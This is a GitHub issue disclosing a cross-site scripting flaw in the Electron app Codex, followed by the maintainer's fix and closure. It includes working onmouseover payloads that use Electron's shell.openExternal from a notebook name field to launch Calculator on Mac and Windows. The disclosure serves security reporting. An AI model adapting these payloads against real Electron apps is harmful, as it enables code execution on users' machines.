Code Execution vulnerability on Codex #8

soulfoodisgood · 2021-09-10T09:06:09Z

Issue

Cross-site scripting(XSS) on Codex Notebook/Page name lead to code execution.

Reproduction

Open Codex
Create new Notebook
Insert payload on the Notebook(or page) name field
On Mac
<a href=x onmouseover="require('electron').shell.openExternal('file:///System/Applications/Calculator.app')">test</a>
On Windows
<a href=x onmouseover="require('electron').shell.openExternal('C:/Windows/System32/calc.exe')">test</a>
Once you move your mouse over the link "test" , Calculator will be opened.

Mitigation

Disable nodeIntegration

The text was updated successfully, but these errors were encountered:

jcv8000 · 2021-09-10T19:33:46Z

Thank you very much for letting me know about this. I've made it so that it sanitizes/escapes the notebook's name/icon text and page's name.

About disabling nodeIntegration, I'm going to do a project rewrite soon that will make the main/renderer processes interact the way they're supposed to do securely, and that'll include disabling nodeIntegration. But I just wanted to get this fix out quickly and that rewrite is gonna take a while

jcv8000 added the bug Something isn't working label Sep 10, 2021

jcv8000 added a commit that referenced this issue Sep 10, 2021

validate notebook names and page names #8

4b78eeb

jcv8000 closed this as completed Sep 10, 2021

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Code Execution vulnerability on Codex #8

Code Execution vulnerability on Codex #8

soulfoodisgood commented Sep 10, 2021 •

edited

Loading

jcv8000 commented Sep 10, 2021

Code Execution vulnerability on Codex #8

Code Execution vulnerability on Codex #8

Comments

soulfoodisgood commented Sep 10, 2021 • edited Loading

Issue

Reproduction

Mitigation

jcv8000 commented Sep 10, 2021

soulfoodisgood commented Sep 10, 2021 •

edited

Loading